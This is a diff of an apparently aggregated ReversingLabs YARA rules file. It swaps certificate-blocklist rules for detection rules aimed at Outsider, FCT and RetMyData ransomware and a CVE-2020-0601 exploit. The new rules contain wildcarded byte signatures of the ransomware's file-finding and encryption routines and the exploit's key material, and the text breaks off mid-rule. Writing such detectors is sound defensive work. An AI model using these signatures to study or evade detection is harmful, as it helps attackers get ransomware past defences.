+		logic_hash = "80c5a93b5b72b7b66e36f1726486b0c7620588d05bd925510d76f020a40b124c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Outsider"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? 8B D9 50 6A ?? 5E 56 FF 35 ?? ?? ?? ??
+            89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 55 ?? 89 75 ?? 8B CF 2B
+            D7 8A 04 0A 88 01 41 83 EE ?? 75 ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 56 FF 35 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 75 ?? 89 75 ?? 53 FF 15 ?? ?? ?? ?? 8D
+            04 43 83 E8 ?? 66 83 38 ?? 75 ?? FF B6 ?? ?? ?? ?? 2B C3 83 C0 ?? D1 F8 8D 04 43 50
+            FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF B6 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ??
+            8B F0 FF 15 ?? ?? ?? ?? 3B C6 74 ?? 8B 75 ?? 83 C6 ?? 89 75 ?? 83 FE ?? 72 ?? EB ??
+            C7 45 ?? ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 50 FF 15 ?? ?? ??
+            ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 8B D8 33 C0 50 8D 45 ?? 50 68 ?? ?? ??
+            ?? 53 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 33 C0 89 4D ?? 3B C8 76 ?? 8B F8 8B C7 25 ?? ??
+            ?? ?? 79 ?? 48 83 C8 ?? 40 89 45 ?? 75 ?? 8B C7 99 83 E2 ?? 03 C2 C1 F8 ?? 99 52 50
+        }
+		$encrypt_files_p2 = {
+            51 51 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 8B 45 ?? 8A 84 05
+            ?? ?? ?? ?? 30 04 1F 47 8B C7 99 85 D2 72 ?? 77 ?? 3B C1 72 ?? 8B 4D ?? 8B 7D ?? 6A
+            ?? F7 D9 8B C1 6A ?? 99 52 50 57 FF 15 ?? ?? ?? ?? 33 C0 50 8D 45 ?? 50 FF 75 ?? 53
+            57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 53 33
+            C0 50 FF D6 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 5D ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ??
+            50 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 50 8D
+            45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 50 8D 45 ?? 50 6A ?? 57
+            FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 50
+            FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 53 FF 15 ?? ?? ?? ?? 56 33 F6 56 FF 15 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? EB ?? 33 F6 57 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E
+            5B 8B E5 5D C3
+        }
+		$find_files = {
+            8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 57 68 ?? ?? ?? ?? 6A ?? FF
+            D3 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ??
+            0F 84 ?? ?? ?? ?? 8B D8 33 FF FF B7 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 83 C7 ?? 83 FF ?? 72 ?? 8D 44 24 ?? 50 FF 75 ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ??
+            8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 59 EB ?? 8B 44 24 ?? A8 ?? 74 ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 8B CE E8 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CE E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 56
+            6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$enum_resources = {
+            55 8B EC 83 E4 ?? 83 EC ?? 83 0C 24 ?? 8D 44 24 ?? 53 56 57 50 FF 75 ?? C7 44 24 ??
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ??
+            83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? EB ?? 33
+            DB 39 5C 24 ?? 76 ?? 8D 77 ?? F6 46 ?? ?? 74 ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? EB ?? FF
+            36 E8 ?? ?? ?? ?? 43 83 C6 ?? 59 3B 5C 24 ?? 72 ?? 8D 44 24 ?? 50 57 8D 44 24 ?? 50
+            FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ??
+            ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMACKTECH SOFTWARE LIMITED" and pe.signatures [ i ] . serial == "41:52:16:9f:22:45:4e:d6:04:d0:35:55:b7:af:b1:75" and 1595808000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_01C88Ccbd219500139D1Af138A9E898E : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_FCT : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects FCT ransomware."
 		author = "ReversingLabs"
-		id = "e3bd6be6-461c-56fd-8dfd-8205845f731e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "ea3d5514-d6f2-5fd0-9247-a3f6b920d8d9"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4610-L4626"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.FCT.yara#L1-L86"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d1acb0a7d6e20158797e77c066be42548cee9293fa94f24f936a95977ac16d91"
+		logic_hash = "b158ad56c92a926f7398a27b3576c259e39c9716ef192fa5944ce3cffdc6d7d0"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "FCT"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ??
+            ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 51 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 33 DB 8B 55 ?? 33 C9 8B 75
+            ?? 89 9D ?? ?? ?? ?? 85 D2 74 ?? 66 90 83 7D ?? ?? 8D 45 ?? 0F 43 C6 0F BE 04 08 41
+            03 D8 3B CA 72 ?? 89 9D ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B CF C7 45 ?? ?? ?? ?? ?? 33 C0
+            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1
+            F9 51 57 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 75 ?? 8B C6 8B 55 ?? 2B C2 83 F8 ??
+            72 ?? 83 FE ?? 8D 45 ?? 8D 4A ?? BB ?? ?? ?? ?? 0F 43 45 ?? 89 4D ?? 66 89 1C 50 33
+            D2 66 89 14 48 EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51
+        }
+		$find_files_p2 = {
+            52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55
+            ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
+            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 55 ?? 8D 48 ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 52
+            ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83
+            FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
+            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D
+            ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 E8
+        }
+		$encrypt_files_p1 = {
+            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 57 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8B 75 ?? 8B C6 8B 55 ?? 2B C2 83 F8 ?? 72 ?? 83 FE ?? 8D 45 ?? 8D 4A ?? BB ?? ??
+            ?? ?? 0F 43 45 ?? 89 4D ?? 66 89 1C 50 33 D2 66 89 14 48 EB ?? 6A ?? 68 ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 8B 5D ?? 2B CA 8B 55 ?? 8B C3 D1 F9 2B
+            C2 3B C8 77 ?? 83 FB ?? 8D 04 09 50 8D 75 ?? 0F 43 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 3C
+            0A 89 7D ?? 8D 04 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 8D 85 ??
+            ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 81 BD
+            ?? ?? ?? ?? ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F
+            84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F2 85 F6 74
+        }
+		$encrypt_files_p2 = {
+            6A ?? 8D 45 ?? 50 A1 ?? ?? ?? ?? 2B C6 56 03 C1 50 57 FF 15 ?? ?? ?? ?? 2B 75 ?? 74
+            ?? 8B 8D ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 33 C0 8B 9D ?? ?? ?? ??
+            BA ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 CB ?? 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            89 95 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8D 48 ?? 3B CA 76 ?? C6 85 ?? ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 95 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ?? 3B C2 77 ?? 8D 34 00 89 85 ??
+            ?? ?? ?? 83 FA ?? 8D BD ?? ?? ?? ?? 56 0F 43 BD ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83
+            C4 ?? 33 C0 66 89 04 37 EB ?? 50 51 C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 83 F8 ??
+            72 ?? 83 FA ?? 8D B5 ?? ?? ?? ?? 6A ?? 0F 43 B5 ?? ?? ?? ?? 8D 79 ?? 68 ?? ?? ?? ??
+            89 BD ?? ?? ?? ?? 8D 04 4E 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 6A ??
+            68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 8D ?? ?? ?? ?? 83 7D
+            ?? ?? 51 0F 43 45 ?? 50 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Raymond Yanagita" and pe.signatures [ i ] . serial == "01:c8:8c:cb:d2:19:50:01:39:d1:af:13:8a:9e:89:8e" and 1593041280 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_41D05676E0D31908Be4Dead3486Aeae3 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Retmydata : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects RetMyData ransomware."
 		author = "ReversingLabs"
-		id = "bca4533d-e721-5f23-984a-3b741ca8b53f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "f7a091d9-7ace-5aad-95b4-d5101fa7fdea"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4628-L4644"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.RetMyData.yara#L1-L79"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c4905f02c74df6d05b3f9a6fe2c4f5f32a02bb10da4db929314be043be76d703"
+		logic_hash = "54ce38d75e9ab82a77b9c338f75e180e19ac745f149289c7478a4aa3b44d70fd"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "RetMyData"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rov SP Z O O" and pe.signatures [ i ] . serial == "41:d0:56:76:e0:d3:19:08:be:4d:ea:d3:48:6a:ea:e3" and 1594857600 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_8Cff807Edaf368A60E4106906D8Df319 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "c964a540-6124-52f0-b17f-692cd4b9b3af"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4646-L4664"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6fc98519faf218d90bb4e01821e6014e009c0b525cfd3c906a64ef82bc20beda"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            55 89 E5 57 56 53 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 29 C4 8D 9D ?? ?? ?? ?? 8B 04 04
+            C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 89 44 24 ?? 89 C7 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 40 51 51 0F 84 ?? ?? ?? ?? 8D
+            B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 85
+            C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 85 C0 74 ?? F6 85 ?? ?? ??
+            ?? ?? 89 74 24 ?? 89 7C 24 ?? 74 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ??
+            89 D8 E8 ?? ?? ?? ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 89 D8 E8 ?? ?? ?? ?? 85 C0 75 ?? 89 D8 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44
+            24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 52 52 0F 85 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 50 8D 65 ?? 5B 5E 5F 5D C3 55 BA ?? ?? ?? ?? 89
+            E5 53 51 89 C3 E8 ?? ?? ?? ?? 48 74 ?? 5A 89 D8 5B 5D E9 ?? ?? ?? ?? 58 5B 5D C3
+        }
+		$enum_resources = {
+            55 89 E5 57 56 53 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 29 C4 8D 95 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 8B 04 04 C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ??
+            83 EC ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 31 F6 89
+            44 24 ?? 8D 85 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ??
+            ?? ?? ?? 83 EC ?? 3B B5 ?? ?? ?? ?? 7D ?? 83 7B ?? ?? 75 ?? 8B 43 ?? C7 44 24 ?? ??
+            ?? ?? ?? 89 3C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 F8 E8 ?? ?? ?? ?? 89 D8 46 83 C3 ??
+            E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 50 8D 65 ?? 5B 5E 5F
+            5D C3
+        }
+		$encrypt_files = {
+            55 89 E5 57 56 53 89 C3 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
+            C0 89 C2 A3 ?? ?? ?? ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 31
+            C0 89 D7 F3 AB 85 DB 75 ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 5C 24 ?? 8D 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 89 3C
+            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C
+            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34
+            24 E8 ?? ?? ?? ?? 89 74 24 ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 EC
+            ?? 83 F8 ?? 89 C3 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 89 7C 24 ?? 89 34 24 EB ?? 8D
+            BD ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? 89
+            1C 24 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8
+            ?? ?? ?? ?? EB ?? F7 D8 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ??
+            89 1C 24 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 EC ?? BA ?? ?? ?? ?? C7 04 24 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            74 24 ?? 89 1C 24 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 83 EC ??
+            FF 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KRAFT BOKS OOO" and ( pe.signatures [ i ] . serial == "00:8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" or pe.signatures [ i ] . serial == "8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" ) and 1598334455 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( $encrypt_files )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A3E62Be1572293Ad618F58A8Aa32857F : INFO FILE
+rule REVERSINGLABS_Win32_Exploit_CVE20200601 : TC_DETECTION MALICIOUS EXPLOIT CVE_2020_0601 FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects CVE-2020-0601 exploit."
 		author = "ReversingLabs"
-		id = "2f67abf3-390a-5c67-afed-e586e20692af"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "6a03fd5e-3b7f-5b71-b897-5cac81721a56"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4666-L4684"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/exploit/Win32.Exploit.CVE20200601.yara#L3-L253"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f849898465bc651f19f6f1b54315c061466d8c5860ecf1a07f54c8c8292f6a95"
+		logic_hash = "e4d915560ad72e0fde63276f9ffece00535c7983125efaa8298adc11d5e54817"
 		score = 75
-		quality = 90
-		tags = "INFO, FILE"
+		quality = 88
+		tags = "TC_DETECTION, MALICIOUS, EXPLOIT, CVE-2020-0601, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "EXPLOIT"
+		exploit = "CVE-2020-0601"
+		tc_detection_type = "Exploit"
+		tc_detection_name = "CVE-2020-0601"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$oid_prime_explicit = {
+            06 07 2A 86 48 CE 3D 01 01
+        }
+		$ecc_public_key_1 = {
+            04 47 45 0E 96 FB 7D 5D BF E9 39 D1 21 F8 9F 0B
+            B6 D5 7B 1E 92 3A 48 59 1C F0 62 31 2D C0 7A 28
+            FE 1A A7 5C B3 B6 CC 97 E7 45 D4 58 FA D1 77 6D
+            43 A2 C0 87 65 34 0A 1F 7A DD EB 3C 33 A1 C5 9D
+            4D A4 6F 41 95 38 7F C9 1E 84 EB D1 9E 49 92 87
+            94 87 0C 3A 85 4A 66 9F 9D 59 93 4D 97 61 06 86
+            4A
+        }
+		$ecc_public_key_2 = {
+            04 84 13 C9 D0 BA 6D 41 7B E2 6C D0 EB 55 5F 66
+            02 1A 24 F4 5B 89 69 47 E3 B8 C2 7D F1 F2 02 C5
